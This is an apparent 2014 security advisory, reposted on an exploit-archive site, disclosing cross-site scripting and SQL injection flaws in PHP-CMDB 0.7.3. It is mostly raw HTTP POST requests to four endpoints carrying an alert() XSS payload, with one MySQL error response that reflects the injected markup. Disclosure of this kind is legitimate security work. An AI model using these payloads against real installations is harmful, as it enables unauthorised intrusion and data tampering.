PHP-CMDB 0.7.3 Cross Site Scripting / SQL Injection

2014.02.28
Credit: HauntIT
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89
CWE-79

# ============================================================== # Title ...| Multiple vulnerabilities in PHP-CMDB # Version .| php-cmdb_0.7.3 # Date ....| 27.02.2014 # Found ...| HauntIT Blog # Home ....| # ============================================================== [+] From admin logged-in # ============================================================== # 1. XSS in SQL error ---<request>--- POST /k/cms/php-cmdb/php-cmdb_0.7.3/www/index.php HTTP/1.1 Host: 10.149.14.62 (...) Content-Length: 57 s_text='%3e"%3e%3cbody%2fonload%3dalert(9999)%3e&s_form=1 ---<request>--- ---<response>--- <td colspan='2' class='c_attr r_attr'>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"><body/onload=alert(9999)>%' AND ci_cit_id=cit_id ORDER BY ci_title, cit_title' at line 1</td> </tr> ---<response>--- Same parameter seems to be vulnerable to SQL Injection attack. ("The used SELECT statements have a different number of columns") # ============================================================== # 2. XSS ---<request>--- POST /k/cms/php-cmdb/php-cmdb_0.7.3/www/ci_create.php HTTP/1.1 Host: 10.149.14.62 (...) Content-Length: 93 ci_id=0&ci_clone_id=0&ci_icon='%3e"%3e%3cbody%2fonload%3dalert(9999)%3e&ci_form=1&ci_cit_id=0 ---<request>--- # ============================================================== # 3. XSS /SQLi ---<request>--- POST /k/cms/php-cmdb/php-cmdb_0.7.3/www/search_advanced.php HTTP/1.1 Host: 10.149.14.62 (...) Content-Length: 100 s_form=2&s_text='%3e"%3e%3cbody%2fonload%3dalert(9999)%3e&s_cit_id=0&s_cat_id=0&s_compare_operator=0 ---<request>--- # ============================================================== # 4. XSS / SQLi ---<request>--- POST /k/cms/php-cmdb/php-cmdb_0.7.3/www/u_create_run.php HTTP/1.1 Host: 10.149.14.62 (...) Content-Length: 153 u_id=0&u_form=1&u_login='%3e"%3e%3cbody%2fonload%3dalert(9999)%3e&u_active=1&u_last_name=tester&u_first_name=tester&u_role_id=1&u_email=&u_auth_backend=0 ---<request>--- # ============================================================== # More @ http://HauntIT.blogspot.com # Thanks! ;) # o/


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top